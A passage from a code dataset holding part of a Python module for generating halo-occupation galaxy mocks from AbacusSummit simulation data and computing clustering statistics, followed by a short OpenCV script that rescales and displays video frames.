sim_params['subsample_dir']\n self.z_mock = sim_params['z_mock']\n self.output_dir = sim_params['output_dir']\n \n # tracers\n tracer_flags = HOD_params['tracer_flags']\n tracers = {}\n for key in tracer_flags.keys():\n if tracer_flags[key]:\n tracers[key] = HOD_params[key+'_params']\n self.tracers = tracers\n\n # HOD parameter choices\n self.want_ranks = HOD_params['want_ranks']\n self.want_rsd = HOD_params['want_rsd']\n\n # clusteringparameters\n self.pimax = clustering_params['pimax']\n self.pi_bin_size = clustering_params['pi_bin_size']\n bin_params = clustering_params['bin_params']\n self.rpbins = np.logspace(bin_params['logmin'], bin_params['logmax'], bin_params['nbins'] + 1)\n self.clustering_type = clustering_params['clustering_type']\n \n # load the subsample particles\n self.halo_data, self.particle_data, self.params, self.mock_dir = self.staging()\n\n # determine the halo mass function\n self.logMbins = np.linspace(\n np.log10(np.min(self.halo_data['hmass'])), \n np.log10(np.max(self.halo_data['hmass'])), 101)\n self.deltacbins = np.linspace(-0.5, 0.5, 101)\n self.fenvbins = np.linspace(-0.5, 0.5, 101)\n\n self.halo_mass_func, edges = np.histogramdd(\n np.vstack((np.log10(self.halo_data['hmass']), self.halo_data['hdeltac'], self.halo_data['hfenv'])).T,\n bins = [self.logMbins, self.deltacbins, self.fenvbins],\n weights = self.halo_data['hmultis'])\n # print(\"tot num halos in histogram\", np.sum(self.halo_mass_func),\n # \"tot num halos in array\", np.sum(self.halo_data['hmultis']),\n # np.min(self.halo_data['hdeltac']), np.max(self.halo_data['hdeltac']),\n # np.min(self.halo_data['hfenv']), np.max(self.halo_data['hfenv']))\n\n\n\n def 
staging(self):\n \"\"\"\n Constructor call this function to load the halo+particle subsamples onto memory. \n \"\"\"\n # all paths relevant for mock generation\n output_dir = Path(self.output_dir)\n simname = Path(self.sim_name)\n sim_dir = Path(self.sim_dir)\n mock_dir = output_dir / simname / ('z%4.3f'%self.z_mock)\n # create mock_dir if not created\n mock_dir.mkdir(parents = True, exist_ok = True)\n subsample_dir = \\\n Path(self.subsample_dir) / simname / ('z%4.3f'%self.z_mock)\n\n # load header to read parameters\n #halo_info_fns = list((sim_dir / simname / 'halos' / ('z%4.3f'%self.z_mock) / 'halo_info').glob('*.asdf'))\n #halo_info_fns = [(sim_dir / simname / 'halos_light_cones' / ('z%4.3f'%self.z_mock) / 'lc_halo_info.asdf')]\n halo_info_fns = [(sim_dir / 'halo_light_cones' / simname / ('z%4.3f'%self.z_mock) / 'lc_halo_info.asdf')]\n f = asdf.open(halo_info_fns[0], lazy_load=True, copy_arrays=False)\n header = f['header']\n\n # constants\n params = {}\n params['z'] = self.z_mock\n params['h'] = header['H0']/100.\n params['Lbox'] = header['BoxSize'] # Mpc / h, box size\n params['Mpart'] = header['ParticleMassHMsun'] # Msun / h, mass of each particle\n params['velz2kms'] = header['VelZSpace_to_kms']/params['Lbox']\n params['origin'] = np.array(header['LightConeOrigins']).reshape(-1,3)[0]\n params['numslabs'] = 1#len(halo_info_fns)#1\n self.lbox = header['BoxSize']\n\n # count ther number of halos and particles\n Nhalos = np.empty(params['numslabs'])\n Nparts = np.empty(params['numslabs']) \n for eslab in range(params['numslabs']):\n \n if 'ELG' not in self.tracers.keys() and 'QSO' not in self.tracers.keys():\n halofilename = subsample_dir / ('halos_xcom_%d_seed600_abacushod'%eslab)\n particlefilename = subsample_dir / ('particles_xcom_%d_seed600_abacushod'%eslab)\n else:\n halofilename = subsample_dir / ('halos_xcom_%d_seed600_abacushod_MT'%eslab)\n particlefilename = subsample_dir / ('particles_xcom_%d_seed600_abacushod_MT'%eslab) \n\n if self.want_ranks:\n particlefilename = str(particlefilename) + '_withranks'\n halofilename = str(halofilename) + '_new.h5'\n particlefilename = str(particlefilename) + '_new.h5'\n\n newfile = h5py.File(halofilename, 'r')\n newpart = h5py.File(particlefilename, 'r')\n Nhalos[eslab] = len(newfile['halos'])\n Nparts[eslab] = len(newpart['particles'])\n Nhalos = Nhalos.astype(int)\n Nparts = Nparts.astype(int)\n Nhalos_tot = int(np.sum(Nhalos))\n Nparts_tot = int(np.sum(Nparts))\n\n # list holding individual slabs\n hpos = np.empty((Nhalos_tot, 3))\n hvel = np.empty((Nhalos_tot, 3))\n hmass = np.empty([Nhalos_tot])\n hid = np.empty([Nhalos_tot], dtype = int)\n hmultis = np.empty([Nhalos_tot])\n hrandoms = np.empty([Nhalos_tot])\n hveldev = np.empty([Nhalos_tot])\n hdeltac = np.empty([Nhalos_tot])\n hfenv = np.empty([Nhalos_tot])\n\n ppos = np.empty((Nparts_tot, 3))\n pvel = np.empty((Nparts_tot, 3))\n phvel = np.empty((Nparts_tot, 3))\n phmass = np.empty([Nparts_tot])\n phid = np.empty([Nparts_tot], dtype = int)\n pNp = np.empty([Nparts_tot])\n psubsampling = np.empty([Nparts_tot])\n prandoms = np.empty([Nparts_tot])\n pdeltac = np.empty([Nparts_tot])\n pfenv = np.empty([Nparts_tot])\n\n # ranks\n if self.want_ranks:\n p_ranks = np.empty([Nparts_tot])\n p_ranksv = np.empty([Nparts_tot])\n p_ranksp = np.empty([Nparts_tot])\n p_ranksr = np.empty([Nparts_tot])\n\n # B.H. 
make into ASDF\n # load all the halo and particle data we need\n halo_ticker = 0\n parts_ticker = 0\n for eslab in range(params['numslabs']):\n print(\"Loading simulation by slab, \", eslab)\n \n if 'ELG' not in self.tracers.keys() and 'QSO' not in self.tracers.keys():\n halofilename = subsample_dir / ('halos_xcom_%d_seed600_abacushod'%eslab)\n particlefilename = subsample_dir / ('particles_xcom_%d_seed600_abacushod'%eslab)\n else:\n halofilename = subsample_dir / ('halos_xcom_%d_seed600_abacushod_MT'%eslab)\n particlefilename = subsample_dir / ('particles_xcom_%d_seed600_abacushod_MT'%eslab) \n\n if self.want_ranks:\n particlefilename = str(particlefilename) + '_withranks'\n halofilename = str(halofilename) + '_new.h5'\n particlefilename = str(particlefilename) + '_new.h5'\n\n newfile = h5py.File(halofilename, 'r')\n maskedhalos = newfile['halos']\n\n # extracting the halo properties that we need\n halo_pos = maskedhalos[\"x_L2com\"] # halo positions, Mpc / h\n #halo_ids = maskedhalos[\"id\"].astype(int) # halo IDs\n halo_ids = maskedhalos[\"haloindex\"].astype(int) # halo IDs\n halo_vels = maskedhalos['v_L2com'] # halo velocities, km/s\n halo_vel_dev = maskedhalos[\"randoms_gaus_vrms\"] # halo velocity dispersions, km/s\n halo_mass = maskedhalos['N']*params['Mpart'] # halo mass, Msun / h, 200b\n halo_deltac = maskedhalos['deltac_rank'] # halo concentration\n halo_fenv = maskedhalos['fenv_rank'] # halo velocities, km/s\n halo_pstart = maskedhalos['npstartA'].astype(int) # starting index of particles\n halo_pnum = maskedhalos['npoutA'].astype(int) # number of particles \n halo_multi = maskedhalos['multi_halos']\n halo_submask = maskedhalos['mask_subsample'].astype(bool)\n halo_randoms = maskedhalos['randoms']\n\n hpos[halo_ticker: halo_ticker + Nhalos[eslab]] = halo_pos\n hvel[halo_ticker: halo_ticker + Nhalos[eslab]] = halo_vels\n hmass[halo_ticker: halo_ticker + Nhalos[eslab]] = halo_mass\n hid[halo_ticker: halo_ticker + Nhalos[eslab]] = halo_ids\n hmultis[halo_ticker: halo_ticker + Nhalos[eslab]] = halo_multi\n hrandoms[halo_ticker: halo_ticker + Nhalos[eslab]] = halo_randoms\n hveldev[halo_ticker: halo_ticker + Nhalos[eslab]] = halo_vel_dev\n hdeltac[halo_ticker: halo_ticker + Nhalos[eslab]] = halo_deltac\n hfenv[halo_ticker: halo_ticker + Nhalos[eslab]] = halo_fenv\n halo_ticker += Nhalos[eslab]\n\n # extract particle data that we need\n newpart = h5py.File(particlefilename, 'r')\n subsample = newpart['particles']\n part_pos = subsample['pos']\n part_vel = subsample['vel']\n part_hvel = subsample['halo_vel']\n part_halomass = subsample['halo_mass'] # msun / h\n part_haloid = subsample['halo_id'].astype(int)\n part_Np = subsample['Np'] # number of particles that end up in the halo\n part_subsample = subsample['downsample_halo']\n part_randoms = subsample['randoms']\n part_deltac = subsample['halo_deltac']\n part_fenv = subsample['halo_fenv']\n\n if self.want_ranks:\n part_ranks = subsample['ranks']\n part_ranksv = subsample['ranksv']\n part_ranksp = subsample['ranksp']\n part_ranksr = subsample['ranksr']\n p_ranks[parts_ticker: parts_ticker + Nparts[eslab]] = part_ranks\n p_ranksv[parts_ticker: parts_ticker + Nparts[eslab]] = part_ranksv\n p_ranksp[parts_ticker: parts_ticker + Nparts[eslab]] = part_ranksp\n p_ranksr[parts_ticker: parts_ticker + Nparts[eslab]] = part_ranksr\n\n # # part_data_slab += [part_ranks, part_ranksv, part_ranksp, part_ranksr]\n # particle_data = vstack([particle_data, new_part_table])\n ppos[parts_ticker: parts_ticker + Nparts[eslab]] = part_pos\n 
pvel[parts_ticker: parts_ticker + Nparts[eslab]] = part_vel\n phvel[parts_ticker: parts_ticker + Nparts[eslab]] = part_hvel\n phmass[parts_ticker: parts_ticker + Nparts[eslab]] = part_halomass\n phid[parts_ticker: parts_ticker + Nparts[eslab]] = part_haloid\n pNp[parts_ticker: parts_ticker + Nparts[eslab]] = part_Np\n psubsampling[parts_ticker: parts_ticker + Nparts[eslab]] = part_subsample\n prandoms[parts_ticker: parts_ticker + Nparts[eslab]] = part_randoms\n pdeltac[parts_ticker: parts_ticker + Nparts[eslab]] = part_deltac\n pfenv[parts_ticker: parts_ticker + Nparts[eslab]] = part_fenv\n parts_ticker += Nparts[eslab]\n\n halo_data = {\"hpos\": hpos, \n \"hvel\": hvel, \n \"hmass\": hmass, \n \"hid\": hid, \n \"hmultis\": hmultis, \n \"hrandoms\": hrandoms, \n \"hveldev\": hveldev, \n \"hdeltac\": hdeltac, \n \"hfenv\": hfenv}\n pweights = 1/pNp/psubsampling\n particle_data = {\"ppos\": ppos, \n \"pvel\": pvel, \n \"phvel\": phvel, \n \"phmass\": phmass, \n \"phid\": phid, \n \"pweights\": pweights, \n \"prandoms\": prandoms, \n \"pdeltac\": pdeltac, \n \"pfenv\": pfenv}\n if self.want_ranks:\n particle_data['pranks'] = p_ranks\n particle_data['pranksv'] = p_ranksv\n particle_data['pranksp'] = p_ranksp\n particle_data['pranksr'] = p_ranksr\n else:\n particle_data['pranks'] = np.ones(Nparts_tot)\n particle_data['pranksv'] = np.ones(Nparts_tot)\n particle_data['pranksp'] = np.ones(Nparts_tot)\n particle_data['pranksr'] = np.ones(Nparts_tot)\n \n return halo_data, particle_data, params, mock_dir\n\n \n def run_hod(self, tracers = None, want_rsd = True, write_to_disk = False, Nthread = 16, verbose = False):\n \"\"\"\n Runs a custom HOD.\n\n Parameters\n ----------\n ``tracers``: dict\n dictionary of multi-tracer HOD. ``tracers['LRG']`` is the dictionary of LRG HOD parameters,\n overwrites the ``LRG_params`` argument in the constructor.\n Same for keys ``'ELG'`` and ``'QSO'``.\n \n ``want_rsd``: bool \n enable RSD? default ``True``.\n\n ``write_to_disk``: bool \n output to disk? default ``False``. Setting to ``True`` decreases performance. \n\n ``Nthread``: int\n number of threads in the HOD run. Default 16. \n\n ``verbose``: bool, \n detailed stdout? default ``False``.\n\n Returns\n -------\n mock_dict: dict\n dictionary of galaxy outputs. Contains keys ``'LRG'``, ``'ELG'``, and ``'QSO'``. Each\n tracer key corresponds to a sub-dictionary that contains the galaxy properties with keys \n ``'x'``, ``'y'``, ``'z'``, ``'vx'``, ``'vy'``, ``'vz'``, ``'mass'``, ``'id'``, ``Ncent'``.\n The coordinates are in Mpc/h, and the velocities are in km/s.\n The ``'mass'`` refers to host halo mass and is in units of Msun/h.\n The ``'id'`` refers to halo id, and the ``'Ncent'`` key refers to number of\n central galaxies for that tracer. The first ``'Ncent'`` galaxies \n in the catalog are always centrals and the rest are satellites. \n\n \"\"\"\n if tracers == None:\n tracers = self.tracers\n\n mock_dict = gen_gal_cat(self.halo_data, self.particle_data, tracers, self.params, Nthread, \n enable_ranks = self.want_ranks, \n rsd = want_rsd, \n write_to_disk = write_to_disk, \n savedir = self.mock_dir,\n verbose = False)\n\n return mock_dict\n\n def compute_ngal(self, tracers = None, Nthread = 16):\n \"\"\"\n Computes the number of each tracer generated by the HOD\n\n Parameters\n ----------\n ``tracers``: dict\n dictionary of multi-tracer HOD. 
``tracers['LRG']`` is the dictionary of LRG HOD parameters,\n overwrites the ``LRG_params`` argument in the constructor.\n Same for keys ``'ELG'`` and ``'QSO'``.\n\n ``Nthread``: int\n Number of threads in the HOD run. Default 16. \n\n Returns\n -------\n ngal_dict: dict\n dictionary of number of each tracer. \n\n fsat_dict: dict\n dictionary of satellite fraction of each tracer.\n\n \"\"\"\n if tracers == None:\n tracers = self.tracers\n\n ngal_dict = {}\n fsat_dict = {}\n for etracer in tracers.keys():\n tracer_hod = tracers[etracer]\n if etracer == 'LRG':\n newngal = AbacusHOD._compute_ngal_lrg(\n self.logMbins, self.deltacbins, self.fenvbins, self.halo_mass_func,\n tracer_hod['logM_cut'], tracer_hod['logM1'], tracer_hod['sigma'], \n tracer_hod['alpha'], tracer_hod['kappa'], tracer_hod['Acent'], \n tracer_hod['Asat'], tracer_hod['Bcent'], tracer_hod['Bsat'], tracer_hod['ic'], Nthread)\n ngal_dict[etracer] = newngal[0] + newngal[1]\n fsat_dict[etracer] = newngal[1] / (newngal[0] + newngal[1])\n elif etracer == 'ELG':\n newngal = AbacusHOD._compute_ngal_elg(\n self.logMbins, self.deltacbins, self.fenvbins, self.halo_mass_func, \n tracer_hod['p_max'], tracer_hod['Q'], tracer_hod['logM_cut'], \n tracer_hod['kappa'], tracer_hod['sigma'], tracer_hod['logM1'], \n tracer_hod['alpha'], tracer_hod['gamma'], tracer_hod['A_s'], \n tracer_hod['Acent'], tracer_hod['Asat'], tracer_hod['Bcent'], tracer_hod['Bsat'], Nthread) \n ngal_dict[etracer] = newngal[0] + newngal[1]\n fsat_dict[etracer] = newngal[1] / (newngal[0] + newngal[1])\n elif etracer == 'QSO':\n newngal = AbacusHOD._compute_ngal_qso(\n self.logMbins, self.deltacbins, self.fenvbins, self.halo_mass_func, \n tracer_hod['p_max'], tracer_hod['logM_cut'], \n tracer_hod['kappa'], tracer_hod['sigma'], tracer_hod['logM1'], \n tracer_hod['alpha'], tracer_hod['A_s'], \n tracer_hod['Acent'], tracer_hod['Asat'], tracer_hod['Bcent'], tracer_hod['Bsat'], Nthread) \n ngal_dict[etracer] = newngal[0] + newngal[1]\n fsat_dict[etracer] = newngal[1] / (newngal[0] + newngal[1])\n return ngal_dict, fsat_dict\n\n @staticmethod\n @njit(fastmath = True, parallel = True)\n def _compute_ngal_lrg(logMbins, deltacbins, fenvbins, halo_mass_func,\n logM_cut, logM1, sigma, alpha, kappa, Acent, Asat, Bcent, Bsat, ic, Nthread):\n \"\"\"\n internal helper to computer number of LRGs\n \"\"\"\n numba.set_num_threads(Nthread)\n\n logMs = 0.5*(logMbins[1:] + logMbins[:-1])\n deltacs = 0.5*(deltacbins[1:] + deltacbins[:-1])\n fenvs = 0.5*(fenvbins[1:] + fenvbins[:-1])\n ngal_cent = 0\n ngal_sat = 0\n for i in numba.prange(len(logMbins) - 1):\n for j in range(len(deltacbins) - 1):\n for k in range(len(fenvbins) - 1):\n Mh_temp = 10**logMs[i]\n logM_cut_temp = logM_cut + Acent * deltacs[j] + Bcent * fenvs[k]\n M1_temp = 10**(logM1 + Asat * deltacs[j] + Bsat * fenvs[k])\n ncent_temp = n_cen_LRG(Mh_temp, logM_cut_temp, sigma)\n nsat_temp = n_sat_LRG_modified(Mh_temp, logM_cut_temp, \n 10**logM_cut_temp, M1_temp, sigma, alpha, kappa)\n ngal_cent += halo_mass_func[i, j, k] * ncent_temp * ic\n ngal_sat += halo_mass_func[i, j, k] * nsat_temp * ic\n return ngal_cent, ngal_sat\n\n @staticmethod\n @njit(fastmath = True, parallel = True)\n def _compute_ngal_elg(logMbins, deltacbins, fenvbins, halo_mass_func, p_max, Q,\n logM_cut, kappa, sigma, logM1, alpha, gamma, A_s, Acent, Asat, Bcent, Bsat, Nthread):\n \"\"\"\n internal helper to computer number of LRGs\n \"\"\"\n numba.set_num_threads(Nthread)\n\n logMs = 0.5*(logMbins[1:] + logMbins[:-1])\n deltacs = 0.5*(deltacbins[1:] + 
deltacbins[:-1])\n fenvs = 0.5*(fenvbins[1:] + fenvbins[:-1])\n ngal_cent = 0\n ngal_sat = 0\n for i in numba.prange(len(logMbins) - 1):\n for j in range(len(deltacbins) - 1):\n for k in range(len(fenvbins) - 1):\n Mh_temp = 10**logMs[i]\n logM_cut_temp = logM_cut + Acent * deltacs[j] + Bcent * fenvs[k]\n M1_temp = 10**(logM1 + Asat * deltacs[j] + Bsat * fenvs[k])\n ncent_temp = N_cen_ELG_v1(Mh_temp, p_max, Q, logM_cut_temp, sigma, gamma)\n nsat_temp = N_sat_generic(Mh_temp, 10**logM_cut_temp, kappa, M1_temp, alpha, A_s)\n ngal_cent += halo_mass_func[i, j, k] * ncent_temp\n ngal_sat += halo_mass_func[i, j, k] * nsat_temp\n return ngal_cent, ngal_sat\n\n @staticmethod\n @njit(fastmath = True, parallel = True)\n def _compute_ngal_qso(logMbins, deltacbins, fenvbins, halo_mass_func, p_max,\n logM_cut, kappa, sigma, logM1, alpha, A_s, Acent, Asat, Bcent, Bsat, Nthread):\n \"\"\"\n internal helper to compute the number of QSOs\n \"\"\"\n numba.set_num_threads(Nthread)\n\n logMs = 0.5*(logMbins[1:] + logMbins[:-1])\n deltacs = 0.5*(deltacbins[1:] + deltacbins[:-1])\n fenvs = 0.5*(fenvbins[1:] + fenvbins[:-1])\n ngal_cent = 0\n ngal_sat = 0\n for i in numba.prange(len(logMbins) - 1):\n for j in range(len(deltacbins) - 1):\n for k in range(len(fenvbins) - 1):\n Mh_temp = 10**logMs[i]\n logM_cut_temp = logM_cut + Acent * deltacs[j] + Bcent * fenvs[k]\n M1_temp = 10**(logM1 + Asat * deltacs[j] + Bsat * fenvs[k])\n ncent_temp = N_cen_QSO(Mh_temp, p_max, logM_cut_temp, sigma)\n nsat_temp = N_sat_generic(Mh_temp, 10**logM_cut_temp, kappa, M1_temp, alpha, A_s)\n ngal_cent += halo_mass_func[i, j, k] * ncent_temp\n ngal_sat += halo_mass_func[i, j, k] * nsat_temp\n return ngal_cent, ngal_sat\n\n def compute_clustering(self, mock_dict, *args, **kwargs):\n \"\"\"\n Computes summary statistics, currently enabling ``wp`` and ``xirppi``.\n\n Parameters\n ----------\n ``mock_dict``: dict\n dictionary of tracer positions. Output of ``run_hod``. \n\n ``Nthread``: int\n number of threads in the HOD run. Default 8. \n\n ``rpbins``: np.array\n array of transverse bins in Mpc/h.\n\n ``pimax``: int\n maximum bin edge along the line of sight direction, in Mpc/h. \n\n ``pi_bin_size``: int\n size of bin along the line of sight. Currently, we only support linear binning along the line of sight. \n\n Returns\n -------\n clustering: dict\n dictionary of summary statistics. Auto-correlations/spectra can be\n accessed with keys such as ``'LRG_LRG'``. Cross-correlations/spectra can be \n accessed with keys such as ``'LRG_ELG'``. \n \"\"\"\n if self.clustering_type == 'xirppi':\n clustering = self.compute_xirppi(mock_dict, *args, **kwargs)\n elif self.clustering_type == 'wp':\n clustering = self.compute_wp(mock_dict, *args, **kwargs)\n return clustering\n \n def compute_xirppi(self, mock_dict, rpbins, pimax, pi_bin_size, Nthread = 8):\n \"\"\"\n Computes :math:`\\\\xi(r_p, \\\\pi)`.\n\n Parameters\n ----------\n ``mock_dict``: dict\n dictionary of tracer positions. Output of ``run_hod``. \n\n ``Nthread``: int\n number of threads in the HOD run. Default 8. \n\n ``rpbins``: np.array\n array of transverse bins in Mpc/h.\n\n ``pimax``: int\n maximum bin edge along the line of sight direction, in Mpc/h. \n\n ``pi_bin_size``: int\n size of bin along the line of sight. Currently, we only support linear binning along the line of sight. \n\n Returns\n -------\n clustering: dict\n dictionary of summary statistics. Auto-correlations/spectra can be\n accessed with keys such as ``'LRG_LRG'``. Cross-correlations/spectra can be \n accessed with keys such as ``'LRG_ELG'``. \n \"\"\"\n clustering = {}\n for i1, tr1 in enumerate(mock_dict.keys()):\n x1 = mock_dict[tr1]['x']\n y1 = mock_dict[tr1]['y']\n z1 = mock_dict[tr1]['z']\n for i2, tr2 in enumerate(mock_dict.keys()):\n if i1 > i2: continue # cross-correlations are symmetric\n if i1 == i2: # auto corr\n clustering[tr1+'_'+tr2] = calc_xirppi_fast(x1, y1, z1, rpbins, pimax, pi_bin_size, \n self.lbox, Nthread)\n else:\n x2 = mock_dict[tr2]['x']\n y2 = mock_dict[tr2]['y']\n z2 = mock_dict[tr2]['z']\n clustering[tr1+'_'+tr2] = calc_xirppi_fast(x1, y1, z1, rpbins, pimax, pi_bin_size, \n self.lbox, Nthread, x2 = x2, y2 = y2, z2 = z2)\n clustering[tr2+'_'+tr1] = clustering[tr1+'_'+tr2]\n return clustering\n\n def compute_wp(self, mock_dict, rpbins, pimax, pi_bin_size, Nthread = 8):\n \"\"\"\n Computes :math:`w_p`.\n\n Parameters\n ----------\n ``mock_dict``: dict\n dictionary of tracer positions. Output of ``run_hod``. \n\n ``Nthread``: int\n number of threads in the HOD run. Default 8. \n\n ``rpbins``: np.array\n array of transverse bins in Mpc/h.\n\n ``pimax``: int\n maximum bin edge along the line of sight direction, in Mpc/h. \n\n ``pi_bin_size``: int\n size of bin along the line of sight. Currently, we only support linear binning along the line of sight. \n\n Returns\n -------\n clustering: dict\n dictionary of summary statistics. Auto-correlations/spectra can be\n accessed with keys such as ``'LRG_LRG'``. Cross-correlations/spectra can be \n accessed with keys such as ``'LRG_ELG'``. \n \"\"\"\n clustering = {}\n for i1, tr1 in enumerate(mock_dict.keys()):\n x1 = mock_dict[tr1]['x']\n y1 = mock_dict[tr1]['y']\n z1 = mock_dict[tr1]['z']\n for i2, tr2 in enumerate(mock_dict.keys()):\n if i1 > i2: continue # cross-correlations are symmetric\n if i1 == i2:\n clustering[tr1+'_'+tr2] = calc_wp_fast(x1, y1, z1, rpbins, pimax, self.lbox, Nthread)\n else:\n x2 = mock_dict[tr2]['x']\n y2 = mock_dict[tr2]['y']\n z2 = mock_dict[tr2]['z']\n clustering[tr1+'_'+tr2] = calc_wp_fast(x1, y1, z1, rpbins, pimax, self.lbox, Nthread, \n x2 = x2, y2 = y2, z2 = z2)\n clustering[tr2+'_'+tr1] = clustering[tr1+'_'+tr2]\n return clustering\n\n def gal_reader(self, output_dir = None, simname = None, \n sim_dir = None, z_mock = None, want_rsd = None, tracers = None):\n \"\"\"\n Loads galaxy data from a given directory and returns a ``mock_dict`` dictionary. \n\n Parameters\n ----------\n ``sim_name``: str\n name of the simulation volume, e.g. 'AbacusSummit_base_c000_ph006'. \n\n ``sim_dir``: str\n the directory that the simulation lives in, e.g. '/path/to/AbacusSummit/'. \n\n ``output_dir``: str\n the directory the galaxies were saved to, e.g. '/my/output/galaxies'. \n\n ``z_mock``: float\n which redshift slice, e.g. 0.5. \n\n ``want_rsd``: bool\n RSD?\n\n ``tracers``: dict\n dictionary of tracer types to load, e.g. `{'LRG', 'ELG'}`.\n\n Returns\n -------\n ``mock_dict``: dict\n dictionary of tracer positions. Output of ``run_hod``. 
\n\n \"\"\"\n\n if output_dir == None:\n output_dir = Path(self.output_dir)\n if simname == None:\n simname = Path(self.sim_name)\n if sim_dir == None:\n sim_dir = Path(self.sim_dir)\n if z_mock == None:\n z_mock = self.z_mock\n if want_rsd == None:\n want_rsd = self.want_rsd\n if tracers == None:\n tracers = self.tracers.keys()\n mock_dir = output_dir / simname / ('z%4.3f'%self.z_mock)\n\n if want_rsd:\n rsd_string = \"_rsd\"\n else:\n rsd_string = \"\"\n\n outdir = (self.mock_dir) / (\"galaxies\"+rsd_string)\n\n mockdict = {}\n for tracer in tracers:\n mockdict[tracer] = ascii.read(outdir/(tracer+'s.dat'))\n return mockdict\n\n\n", "repo_name": "abacusorg/abacus_lc_cat", "sub_path": "abacus_hod/hod/abacus_hod.py", "file_name": "abacus_hod.py", "file_ext": "py", "file_size_in_byte": 42084, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.logspace", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.histogramdd", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 311, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 311, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 326, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 327, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 328, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 333, "usage_type": "call"}, {"api_name": "asdf.open", "line_number": 339, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 349, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 354, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 355, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 370, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 376, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 380, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 381, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 382, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 383, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 384, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 385, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 386, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 387, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 388, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 390, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 391, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 392, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 393, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 394, "usage_type": 
"call"}, {"api_name": "numpy.empty", "line_number": 395, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 398, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 399, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 403, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 405, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 406, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 427, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 457, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 519, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 520, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 521, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 522, "usage_type": "call"}, {"api_name": "tpcf_corrfunc.calc_xirppi_fast", "line_number": 782, "usage_type": "call"}, {"api_name": "tpcf_corrfunc.calc_xirppi_fast", "line_number": 788, "usage_type": "call"}, {"api_name": "tpcf_corrfunc.calc_wp_fast", "line_number": 829, "usage_type": "call"}, {"api_name": "tpcf_corrfunc.calc_wp_fast", "line_number": 834, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 872, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 874, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 876, "usage_type": "call"}, {"api_name": "astropy.io.ascii.read", "line_number": 894, "usage_type": "call"}, {"api_name": "astropy.io.ascii", "line_number": 894, "usage_type": "name"}]} +{"seq_id": "38126293713", "text": "import cv2 as cv\n\n# read Images\n\n# img = cv.imread('Resources/Photos/cat.jpg')\n# cv.imshow('cat',img)\n\ndef rescale(frame,scale=0.75):\n width = int(frame.shape[1]*scale)\n height = int(frame.shape[0]*scale)\n\n dimension = (width,height)\n\n return cv.resize(frame,dimension,interpolation = cv.INTER_AREA)\n\n\nvid = cv.VideoCapture('Resources/Videos/dog.mp4')\nwhile True:\n isTrue, frame = vid.read()\n image = cv.flip(frame, 1)\n\n frame_resize = rescale(frame)\n\n cv.imshow('Video',image)\n cv.imshow('vid',frame_resize)\n\n \n if cv.waitKey(20) & 0xFF==ord('d'):\n break\n\nvid.release()\ncv.destroyAllWindows()\n\n\ncv.waitKey(0)", "repo_name": "ankur-raut/openCV", "sub_path": "rescale.py", "file_name": "rescale.py", "file_ext": "py", "file_size_in_byte": 649, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "cv2.resize", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 14, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 32, "usage_type": "call"}, {"api_name": 